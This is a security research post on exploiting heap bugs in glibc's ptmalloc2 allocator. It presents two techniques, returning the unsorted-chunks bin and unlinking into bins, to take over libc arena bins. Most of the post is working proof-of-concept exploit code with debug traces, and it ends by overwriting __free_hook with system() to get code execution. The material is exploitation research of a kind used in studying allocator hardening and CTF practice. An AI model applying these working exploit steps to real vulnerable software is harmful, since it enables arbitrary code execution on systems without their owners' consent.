
From Heap to RIP

I know, I know. With every new paper/post/challenge around ptmalloc2 it feels like everything has been said. And yes, one rarely needs to understand the Malloc Maleficarum to exploit a heap bug. Neither does one need to get PC control from wizardly metadata overwrites to exploit applications where function pointers, indexed arrays and the like already live on the heap.

Nowadays, exploiting a heap bug is often nothing more than finding a way to overwrite interesting structures residing on the heap, by having old chunks overwritten or new chunks allocated within areas under attacker control. Pure heap-metadata exploits have been dismissed as almost impossible for quite a few years now.

So, what about this application where you have a full unbounded overflow on the heap but no interesting data structure worth targeting? Well, with glibc's malloc it may still be generically exploitable for code execution, provided the application gives you good enough heap massaging primitives.


Disclaimer

Of course, we are not talking about a one-shot unlink() anymore. The two example techniques I will present here require strong control of the heap and several malloc/free/metadata overwrites to reach our goal.

By strong control, I mean having initial (write) control over an area of the heap spanning a few chunks, and then being able to perform arbitrary free/malloc sequences. free() can be called on any address previously returned by malloc(), and we need to be able to write normally into newly allocated chunks (but we don't require any special control over allocation sizes).

If we don't have a libc leak, we need to add to that the ability to read into a free chunk, or an allocated chunk that hasn't been initialized at some point.


A ptmalloc2 refresher

The global algorithm of ptmalloc2, the structure of heap chunks and the types of chunks have been described many, many, many times (and more), so I'll consider this a prerequisite to understanding what follows. What I feel hasn't been described as many times is what goes on within the blackbox of malloc, i.e. what the unsorted chunks list is, what the small and large bins are, how malloc chooses chunks to return, etc.

As one may know, free() is a fairly quick operation. Its main purpose is to place the newly freed chunk into the "unsorted chunks" doubly-linked list. It may also merge that chunk with the chunks right before and after if they were already free, after having unlinked those from the freelists they were in. The resulting chunk finishes up in the unsorted chunk list in any case.

The unsorted chunks list is a temporary list where all kinds of free chunks wait to be "sorted" into bins. Bins are doubly-linked lists as well, and each bin is tied to a size range. The bin associated with the requested size is generally checked first by malloc to allow for an efficient allocation.

All of this is done in malloc(). When malloc is called, it tries different strategies to get a big enough memory space to fit the allocation request. At a high level, its strategy is, in order (a toy sketch in pseudocode follows the list):

  • requested size is a fast chunk: try to get a chunk out of the free fast bins list
  • requested size is a small chunk: try to get a chunk out of the small bin of that size
  • until unsorted list is empty, get next unsorted chunk
    • if the requested size is small, that chunk is the only one left in the list, it is the remainder of the last chunk that was split ("last_remainder") and it is big enough: split it and return the front part
    • if the chunk is of the same size as the size requested, return it
    • otherwise insert the chunk in the bin associated with its size
  • try all the non-empty sorted bins for larger chunks and split them if required
  • allocate from the top chunk (last chunk of the heap which is always free)
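
Here is that toy sketch of the decision flow. It is illustrative only and nowhere near the real _int_malloc: the arena object and its helpers (fastbin(), smallbin(), bin_for(), smallest_fitting_sorted_chunk(), split()) are hypothetical names, and the literals are the usual 64-bit values.

def toy_malloc(arena, nb):
    # nb is the padded request size
    if nb <= 0x80 and arena.fastbin(nb):
        return arena.fastbin(nb).pop()               # 1. exact-size fast bin
    if nb < 0x400 and arena.smallbin(nb):
        return arena.smallbin(nb).pop()              # 2. exact-size small bin
    while arena.unsorted:                            # 3. drain the unsorted list
        victim = arena.unsorted.pop()
        if (nb < 0x400 and victim is arena.last_remainder
                and victim.size > nb + 0x20):        #    0x20 == MINSIZE on 64-bit
            return victim.split(nb)                  #    last_remainder shortcut
        if victim.size == nb:
            return victim                            #    exact fit
        arena.bin_for(victim.size).insert(victim)    #    otherwise sort it into a bin
    victim = arena.smallest_fitting_sorted_chunk(nb) # 4. larger sorted bins
    if victim is not None:
        return victim.split(nb)                      #    split, keep the remainder
    return arena.top.split(nb)                       # 5. fall back to the top chunk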

The "bins" are essentially 127 doubly-linked lists. The first one is the unsorted chunks list, then half of the remaining lists are for small bins (one for each 0x10 size), and the rest service large bin requests (with a wider range of size in each bin). Each sorted large chunk is on a secondary doubly-linked list, which sorts chunks in a large bin by size (that way malloc only has to check the first chunk of each bin to know if the bin can satisfy the request).

Memory-wise, these structures live in the malloc_state of the current arena. The main arena lives in libc's .data section, and it is the arena used by most non-threaded applications.

Getting forged addresses into the freelists is easy, but getting them out is a different story. Something interesting is that chunks need to satisfy different conditions to be taken out of the different free lists. In particular:

  • a chunk out of the unsorted chunks list needs to have a size > 0x10 and smaller than the total amount of memory allocated in the current heap
  • a chunk out of a sorted bin needs to have a valid linked list in its bk field (i.e. chunk->bk->fd == chunk)
  • a chunk out of a "generic" freelist (which can be any of the above) needs both of its link fields to form valid lists (i.e. chunk->bk->fd == chunk and chunk->fd->bk == chunk), plus a coherent prev_size in the next chunk (the latest hardening measure). This is the infamous "unlink" macro (a sketch of these checks follows the list).
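
These three checks can be summarized with toy predicates over a flat {address: qword} view of memory (illustrative only, 64-bit offsets, not glibc's literal code):

def ok_out_of_unsorted(mem, chunk, system_mem):
    size = mem[chunk + 0x8] & ~0x7
    return 0x10 < size <= system_mem            # size sanity check only

def ok_out_of_sorted_bin(mem, chunk):
    bck = mem[chunk + 0x18]                     # chunk->bk
    return mem[bck + 0x10] == chunk             # chunk->bk->fd == chunk

def ok_to_unlink(mem, chunk):
    size = mem[chunk + 0x8] & ~0x7
    fd, bk = mem[chunk + 0x10], mem[chunk + 0x18]
    return (mem[fd + 0x18] == chunk             # chunk->fd->bk == chunk
            and mem[bk + 0x10] == chunk         # chunk->bk->fd == chunk
            and mem[chunk + size] == size)      # next chunk's prev_size matches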

I'll now outline two techniques that take advantage of these "inconsistencies" to achieve arbitrary code execution. In both cases our aim is to obtain control over the memory area holding the sorted bin that will serve the next allocation request.


Technique 1: returning the unsorted_chunks chunk

The main thing I leverage in this post is the fact that getting a chunk out of the sorted bins only requires that chunk to be part of a valid linked list. This is particularly interesting considering that the arena's malloc_state itself contains many correctly linked "chunks" in the form of the bin heads.

In this first technique, we will also use the fact that unlinking a chunk from the unsorted chunks list sets chunk->bk->fd to the address of the unsorted list chunk itself, without further checks. We can leverage this to insert the unsorted list chunk into a sorted bin and get it out with the next allocation (the linked-list condition will be satisfied unless the unsorted chunks chunk has been corrupted by previous allocs).

Once we control the unsorted chunks chunk and the first few small bins, we can get another chunk farther away in the bss, as long as we can set its size to match the next allocation. By repeating this process we can take control of any bin.


Proof of Concept #1

I abstracted the vulnerable application, the structure offsets, and the memory read/write primitives into wrapper classes, so that the snippets hereafter (hopefully) read as near-pseudocode. Also, for the sake of readability, I assume that the initial heap bug (double free, use-after-free, overflow) plus the ability to read/write into chunks and free them gives us free rein over chunk metadata (excluding the first chunk under our control). This can be achieved in a variety of ways depending on the original bug, and I feel proving it would unnecessarily tie the techniques to a specific context. However, we won't read or write out of bounds of the initially controlled area or of new chunks. I use fixed-size allocations of 0x300 bytes; this is not essential, but I feel it makes the technique more generic without adding significant hurdles.

For each snippet I also report debug traces to show what happens at a lower level.
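
For reference, here is a rough guess at what the Chunk wrapper could look like; the heap.read_qword()/write_qword() primitives are hypothetical stand-ins for whatever read/write the vulnerable application actually gives us, and only some of the methods used below are sketched:

class Chunk(object):
    # usual 64-bit header layout: prev_size @ 0x0, size @ 0x8, fd @ 0x10, bk @ 0x18
    def __init__(self, heap, data_ptr):
        self.heap = heap
        self.data = data_ptr                 # pointer returned by malloc()
        self.addr = data_ptr - 0x10          # start of the chunk header

    def _read(self, off):
        return self.heap.read_qword(self.addr + off)

    def _write(self, off, value):
        if isinstance(value, Chunk):         # allow assigning another chunk directly
            value = value.addr
        self.heap.write_qword(self.addr + off, value)

    size = property(lambda s: s._read(0x08), lambda s, v: s._write(0x08, v))
    fd   = property(lambda s: s._read(0x10), lambda s, v: s._write(0x10, v))
    bk   = property(lambda s: s._read(0x18), lambda s, v: s._write(0x18, v))

    def set_qword_at_offset(self, off, value):   # offsets relative to the data
        self.heap.write_qword(self.data + off, value)

    def chunk_at_offset(self, off):              # chunk whose header starts at data + off
        return Chunk(self.heap, self.data + off + 0x10)

    # write_at_offset(), dump(), etc. omitted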

First things first, we allocate 5 small chunks on the heap and free the 2nd and 4th ones to get libc and heap leaks. Note that, since no chunk is free at that point, the libc leak is the address of the "top" field of the arena's malloc_state. This is also the chunk address of the unsorted chunks list (the address of its fd field minus 0x10). We don't actually need the heap leak, but since it's there...

print "## Init"
heap = Heap(read, write)  # R/W primitives
chunks = [Chunk(heap, malloc(0x300)) for _ in xrange(5)]
print

print "## Getting unsorted chunks address"
free(chunks[1])
free(chunks[3])
unsorted_leak = chunks[1].fd
heap_leak = chunks[1].bk  # chunks[3]
libc_base = (unsorted_leak & ~0xfff) - LIBC_DATA_FIRST_PAGE
heap.init_from_unsorted_leak(unsorted_leak)
malloc(0x300)  # re-allocate them
malloc(0x300)
print

small_bin_0x300 = heap.get_bin_chunk(heap.smallbin_index(0x300))
small_bin_0x310 = heap.get_bin_chunk(heap.smallbin_index(0x310))
small_bin_0x320 = heap.get_bin_chunk(heap.smallbin_index(0x320))
## Init
malloc(0x300) => 0x214f010
malloc(0x300) => 0x214f320
malloc(0x300) => 0x214f630
malloc(0x300) => 0x214f940
malloc(0x300) => 0x214fc50

## Getting unsorted chunks address
free(0x214f320)
free(0x214f940)
malloc(0x300) => 0x214f320
malloc(0x300) => 0x214f940
Libc @ 0x7ff011ce2000, heap at 0x214f000

When taking a chunk out of the unsorted list, malloc performs chunk->bk->fd = &unsorted_chunks, which is why we can get the unsorted_chunks address written almost anywhere. If we get it written into the right small bin, the next allocation will return a pointer to the unsorted_chunks chunk's fd field.
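
To make the primitive explicit, here is the removal paraphrased in the same toy flat-memory style as before (illustrative, not glibc's literal code):

def unsorted_removal(mem, unsorted_head, victim):
    bck = mem[victim + 0x18]                # victim->bk, fully under our control
    mem[unsorted_head + 0x18] = bck         # unsorted_head->bk = bck
    mem[bck + 0x10] = unsorted_head         # bck->fd = unsorted_head, bck unchecked
    return victim

# Pointing victim->bk at bin_chunk + 0x8 makes that last write land on the bin's
# bk field (bin_chunk + 0x18); this is exactly what the next snippet does with
# small_bin_0x310.data - 8.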

print "##  Getting unsorted_chunks in and out of the bin"
free(chunks[1])
chunks[1].bk = small_bin_0x310.data - 8
malloc(0x300)
print "- Unsorted chunks"
heap.unsorted_chunks.dump(True)
print "- Smallbin 0x310"
small_bin_0x310.dump(True)
bss_chunk = Chunk(heap, malloc(0x300))  # Unsorted chunks
##  Getting unsorted_chunks in and out of the bin
free(0x214f320)
0x214f310->bk = 0x7ff01207be60
malloc(0x300) => 0x214f320
- Unsorted chunks
 -> Chunk @ 0x7ff01207bb58
    fd = 0x214f310
    bk = 0x7ff01207be60
- Smallbin 0x310
 -> Chunk @ 0x7ff01207be58
    fd = 0x7ff01207be58
    bk = 0x7ff01207bb58
malloc(0x300) => 0x7ff01207bb68

From there, we can take advantage of the fact that we control the unsorted_chunks list, and that getting a chunk out of that list only requires the chunk to match the next requested size:

print "##  Getting a chunk farther away in the bss"
bss_chunk.fd = bss_chunk.data+0x280
bss_chunk.bk = bss_chunk.data+0x280
# Straight out of unsorted chunks if size matches next alloc
bss_chunk.set_qword_at_offset(0x288, 0x311)
bss_chunk_2 = Chunk(heap, malloc(0x300))
##  Getting a chunk farther away in the bss
0x7ff01207bb58->fd = 0x7ff01207bde8
0x7ff01207bb58->bk = 0x7ff01207bde8
*(0x7ff01207bdf0) = 0x311
malloc(0x300) => 0x7ff01207bdf8

We can then repeat to get chunks farther away in the bss until we hit the desired small bin. At this point bss_chunk + bss_chunk_2 already span all small bins:

bss_chunk_2.write_at_offset(0, "A"*0x300)
print "- Smallbin 0x310"
small_bin_0x310.dump(True)
- Smallbin 0x310
 -> Chunk @ 0x7ff01207be58
    fd = 0x4141414141414141
    bk = 0x4141414141414141

So we have control of the sorted bin that will serve the next allocation, as well as the memory right after it. We will actually end up in a very similar state after the next technique, so we'll tackle this at the end (and you won't believe what happens next).


Technique 2: unlinking into bins

A fairly well-known consequence of the current unlink() is that any address that points to an attacker-controlled chunk can be rewritten to point (almost) to itself, or to another location that points to the same chunk. An example where this would be directly exploitable is an application that stores a table of heap addresses at a predictable location.

The idea of this 2nd technique is similar: the heap state itself contains quite a few pointers to attacker-controlled locations, in the form of the bin list heads. If we can leverage this to successfully unlink() a chunk whose links point to bins, we can then get a libc .data pointer back from the next allocation.
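
For reference, here is roughly what unlink() does, in the same toy flat-memory style (the prev_size check from the previous section is left out for brevity; this is a paraphrase, not glibc's code):

def toy_unlink(mem, P):
    FD = mem[P + 0x10]                      # P->fd
    BK = mem[P + 0x18]                      # P->bk
    assert mem[FD + 0x18] == P              # FD->bk == P
    assert mem[BK + 0x10] == P              # BK->fd == P
    mem[FD + 0x18] = BK                     # FD->bk = BK
    mem[BK + 0x10] = FD                     # BK->fd = FD

# If P is linked into two small bins, FD and BK can be the two bin "chunks":
# both checks pass, and each bin head ends up holding the other bin's libc
# .data address instead of simply pointing back to itself.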

Note that in the following example I use small bins but this should be possible with any chunk type.


Proof of Concept #2

So we'll restart the PoC exploit from the previous section, right after the initialization code (i.e. after the small_bin_0x320 definition).

To follow the idea explained above, we'll get the address of a chunk we control, chunks[1], into the small bins of sizes 0x300 and 0x310. Something surprising about how chunks are taken out of the unsorted chunks list is that it is possible to have a chunk that will be put into the sorted bin matching the current allocation, yet won't be returned while the unsorted chunks list is processed. This is possible because small bins have a 0x10 granularity, while chunksize(), used to read a chunk's size in the unsorted loop, only aligns sizes to an 8-byte boundary. Very important if the targeted application can only allocate from one bin, as in our imaginary case.
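
The arithmetic behind this trick, on 64-bit and simplified from glibc's macros (re-using the earlier smallbin_index() sketch; treat it as a sketch):

def chunksize(size_field):
    return size_field & ~0x7                # only the three flag bits are masked

def smallbin_index(nb):
    return nb >> 4                          # small bins have a 0x10 granularity

# A size field of 0x319 (0x311 | 8) is not an exact fit for a 0x310 request, so
# the unsorted loop will not return it, yet it is sorted into the same small bin:
assert chunksize(0x319) != 0x310
assert smallbin_index(chunksize(0x319)) == smallbin_index(0x310)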

print "## Inserting chunks[1] in small bin 0x300"
free(chunks[1])
free(chunks[3])
chunks[1].size = 0x301
malloc(0x300)  # This gets old chunk 3 and puts chunk 1 in bin
print "- Smallbin 0x300"
small_bin_0x300.dump(True)
print

print "##  Inserting chunks[1] in small bin 0x310"
chunks[1].size = 0x311
chunks[2].size |= 1  # Restore in-use
free(chunks[1])
free(chunks[3])
chunks[1].size |= 8  # avoid the chunk being returned
malloc(0x300)
print "- Smallbin 0x310"
small_bin_0x310.dump(True)
print
## Inserting chunks[1] in small bin 0x300
free(0xaa3320)
free(0xaa3940)
0xaa3310->size = 0x301
malloc(0x300) => 0xaa3940
- Smallbin 0x300
 -> Chunk @ 0x7f4935721e48
    fd = 0xaa3310
    bk = 0xaa3310

##  Inserting chunks[1] in small bin 0x310
0xaa3310->size = 0x311
0xaa3620->size = 0x311
free(0xaa3320)
free(0xaa3940)
0xaa3310->size = 0x319
malloc(0x300) => 0xaa3940
- Smallbin 0x310
 -> Chunk @ 0x7f4935721e58
    fd = 0xaa3310
    bk = 0xaa3310

The two bins do not have to be consecutive, but having two separate locations holding our attacker-controlled address lets us perform an unlink that does more than just emptying the target bin. We craft chunks[1] so that its fd and bk point to the two bins and satisfy the unlink preconditions, then free chunks[0] to trigger forward coalescing into chunks[1] (chunks[2]->size lost its PREV_INUSE bit during the last round of frees).

print "## Unlinking chunks[1] to set small bin 0x310 ->bk"
chunks[1].size = 0x311
# FD points to SB(310), FD->bk is SB(310)->bk (our target)
# BK points to SB(300), BK->fd is SB(300)->fd (value it receives)
chunks[1].bk = small_bin_0x300
chunks[1].fd = small_bin_0x310
free(chunks[0])  # coalesced forward into chunks[1]
print "- Smallbin for 0x300 allocs"
small_bin_0x300.dump(True)
print "- Smallbin for 0x310 allocs"
small_bin_0x310.dump(True)
print
## Unlinking chunks[1] to set small bin 0x310 ->bk
0xaa3310->size = 0x311
0xaa3310->bk = 0x7f4935721e48
0xaa3310->fd = 0x7f4935721e58
free(0xaa3010)
- Smallbin for 0x300 allocs
 -> Chunk @ 0x7f4935721e48
    fd = 0x7f4935721e58
    bk = 0xaa3310
- Smallbin for 0x310 allocs
 -> Chunk @ 0x7f4935721e58
    fd = 0xaa3310
    bk = 0x7f4935721e48

As we can see in the trace above, the next chunk that will come out of the 0x310 bin (0x7f4935721e48 here) is the chunk address of the 0x300 bin (if we had only used the 0x310 small bin, its bk field would have become 0x7f4935721e58 and the bin would have been considered empty).

The small bin 0x310 is the first thing checked to satisfy 0x300 allocations, so we can get the 0x7f4935721e48 chunk directly out:

print "## Getting chunk pointing to small bin 0x300 out of bin 0x310"
chunks[1].fd = small_bin_0x300
bss_chunk = Chunk(heap, malloc(0x300))
print
## Getting chunk pointing to small bin 0x300 out of bin 0x310
0xaa3310->fd = 0x7f4935721e48
malloc(0x300) => 0x7f4935721e58

We're back to the same level of control as with the first PoC: we control the bin that will serve the next allocation and the surrounding memory.


From bin control to arbitrary code execution

There are probably many ways to finish up from that point; here I'll use the last_remainder mechanism outlined above when explaining how chunks get out of the unsorted chunks list.

The idea I chose is to recreate fake chunks in the controlled section of libc memory and control which addresses malloc() returns through the sorted bins. Taking advantage of the last_remainder heuristic, we can then allocate indefinitely from libc's .data and then .bss sections. The bss has many data structures that yield direct PC control, amongst which __free_hook, which would be directly exploitable here.
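
As a reminder of the last_remainder shortcut in the unsorted loop, here is a toy model in the same flat-memory convention (illustrative only; mem and arena are plain dictionaries). This is the branch that will let the final allocation spree walk forward through libc's memory:

def last_remainder_alloc(mem, arena, nb):
    victim = arena['unsorted'][-1]
    size = mem[victim + 0x8] & ~0x7
    if (len(arena['unsorted']) == 1 and victim == arena['last_remainder']
            and size > nb + 0x20):                # 0x20 == MINSIZE on 64-bit
        remainder = victim + nb
        mem[victim + 0x8] = nb | 1                # front part is returned
        mem[remainder + 0x8] = (size - nb) | 1    # back part keeps the rest...
        arena['last_remainder'] = remainder       # ...becomes the new last_remainder
        arena['unsorted'] = [remainder]           # and stays on the unsorted list
        return victim + 0x10                      # each call advances nb bytes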

From where we left off in the two PoCs, we need to control a chunk larger than 0x300 bytes if we want the last remainder to come from memory we control. The snippets hereafter are the end of PoC #2.

The data of the chunk that was just returned starts at the fd field of the small bin 0x300 chunk, i.e. 0x10 bytes before the fd field of the 0x310 bin (the bins overlap), so we control the address of the next chunk that will come out of that bin: its bk field sits at offset 0x18 of our data. We can set it to an arbitrary bin farther ahead, which will satisfy the chunk->bk->fd == chunk precondition as long as that bin is empty.

print "## Leveraging bin control to get another chunk farther away"
bss_chunk.set_qword_at_offset(0x18, small_bin_0x300.data + 0x280)
bss_chunk_2 = Chunk(heap, malloc(0x300))
print
## Leveraging bin control to get another chunk farther away
*(0x7f4935721e70) = 0x7f49357220d8
malloc(0x300) => 0x7f49357220e8

We can then craft a larger fake chunk that starts in bss_chunk and ends in bss_chunk_2, and add it to a small bin meant for larger allocations. Upon the next allocation, if the smaller bins are correctly linked and empty, malloc() will split that chunk: the first part is returned, and the second part becomes the last_remainder and lands in the unsorted chunks list.

To start from a clean state, we first empty the unsorted chunks list, which still contains chunks[0] from the previous unlink operation.

print "## Some cleanup"
# Empty 0x310 bin and unsorted chunks
bss_chunk.set_qword_at_offset(0x18, small_bin_0x300.data)
malloc(0x300)  # chunks[0] was merged with chunks[1]
chunks[1].fd = heap.unsorted_chunks
chunks[1].bk = heap.unsorted_chunks
malloc(0x300)  # chunks[1] and empty unsorted chunks
print

print "## Set bin 0x320 as non-empty"
chunks[1].size = 0x321
chunks[2].bk = 0x311  # Restore in-use
chunks[3].bk = 0x311
free(chunks[1])
free(chunks[3])
malloc(0x300)
print "- Smallbin 0x320"
small_bin_0x320.dump(True)
print

print "## Alloc out of fake chunk in bss_chunk to control last_remainder"
# Start fake chunk within first bss chunk
# Fake chunk starts at offset 0x30 into bss_chunk
bss_chunk.set_qword_at_offset(0x28, bss_chunk.data + 0x30)  # Bin 0x320 -> bk
print "- Smallbin 0x320"
small_bin_0x320.dump(True)
fake_chunk_size = 0x380
bss_chunk.set_qword_at_offset(0x38, fake_chunk_size | 1)  # set fake size
bss_chunk_2.set_qword_at_offset(0x120, fake_chunk_size)
malloc(0x300)
print "- Last remainder:", hex(heap.last_remainder)
print
## Some cleanup
*(0x7f4935721e70) = 0x7f4935721e58
malloc(0x300) => 0xaa3010
0xaa3310->fd = 0x7f4935721b58
0xaa3310->bk = 0x7f4935721b58
malloc(0x300) => 0xaa3320

## Set bin 0x320 as non-empty
0xaa3310->size = 0x321
0xaa3620->bk = 0x311
0xaa3930->bk = 0x311
free(0xaa3320)
free(0xaa3940)
malloc(0x300) => 0xaa3940
- Smallbin 0x320
 -> Chunk @ 0x7f4935721e68
    fd = 0xaa3310
    bk = 0xaa3310

## Alloc out of fake chunk in bss_chunk to control last_remainder
*(0x7f4935721e80) = 0x7f4935721e88
- Smallbin 0x320
 -> Chunk @ 0x7f4935721e68
    fd = 0xaa3310
    bk = 0x7f4935721e88
*(0x7f4935721e90) = 0x381
*(0x7f4935722208) = 0x380
malloc(0x300) => 0x7f4935721e98
- Last remainder: 0x7f4935722198

Finally, we only need to enlarge the size of the last_remainder chunk so that it encompasses the targeted libc data structures.

print "## Enlarging last_remainder and getting it in unsorted bin"
last_remainder = bss_chunk_2.chunk_at_offset(0xb0)
last_remainder.size = 0x3001
chunks[1].size = 0x311
chunks[2].size = 0x311
free(chunks[1])
chunks[1].fd = heap.last_remainder
chunks[1].bk = heap.last_remainder
malloc(0x300)
print "- Unsorted bin"
heap.unsorted_chunks.dump(True)
print
## Enlarging last_remainder and getting it in unsorted bin
0x7f4935722198->size = 0x3001
0xaa3310->size = 0x311
0xaa3620->size = 0x311
free(0xaa3320)
0xaa3310->fd = 0x7f4935722198
0xaa3310->bk = 0x7f4935722198
malloc(0x300) => 0xaa3320
- Unsorted bin
 -> Chunk @ 0x7f4935721b58
    fd = 0xaa3310
    bk = 0x7f4935722198

We can now allocate as much as we want in libc's .data and .bss until we reach whatever data structure we target. For instance, we can overwrite __free_hook and free an arbitrary chunk to gain code exec:

print "## Alloc spree to overwrite __free_hook"
last_remainder.fd = heap.unsorted_chunks
last_remainder.bk = heap.unsorted_chunks
# Alloc until __free_hook is overwriteable, fixed offset depending on the libc
malloc(0x300)
malloc(0x300)
malloc(0x300)
malloc(0x300)
malloc(0x300)
malloc(0x300)
malloc(0x300)
target = Chunk(heap, malloc(0x300))
target.set_qword_at_offset(0x70, libc_base + LIBC_SYSTEM)
chunks[1].write_at_offset(0, "id\x00")
free(chunks[1])  # RIP
## Alloc spree to overwrite __free_hook
0x7f4935722198->fd = 0x7f4935721b58
0x7f4935722198->bk = 0x7f4935721b58
malloc(0x300) => 0x7f49357221a8
malloc(0x300) => 0x7f49357224b8
malloc(0x300) => 0x7f49357227c8
malloc(0x300) => 0x7f4935722ad8
malloc(0x300) => 0x7f4935722de8
malloc(0x300) => 0x7f49357230f8
malloc(0x300) => 0x7f4935723408
malloc(0x300) => 0x7f4935723718
*(0x7f4935723788) = 0x7f49353c7450
free(0xaa3320)
uid=1000(user) gid=1000(user) groups=1000(user)

And that's it: we've been able to execute arbitrary code from a pure heap exploit, independently of the data structures residing on the heap. To sum up, these techniques require being able to freely write over an area of the heap spanning a few small chunks, most likely through a repeatable heap bug, and then to malloc/free chunks of our choosing.

This is unlikely to be useful when exploiting complex applications, which often already have numerous data structures and/or vtables on the heap, but it can be interesting when more common techniques cannot yield code execution. More generally, it is a reminder that heap bugs should be considered exploitable until proven otherwise.

Who knows, it might even be useful in CTFs ;)

NB: a small check has been introduced to harden the unsorted chunks list a bit. It ensures that one cannot go from a single controlled pointer to overwritten arena metadata (as shown in Technique 1), but it is obviously still possible to get the unsorted chunks chunk out with slightly more control.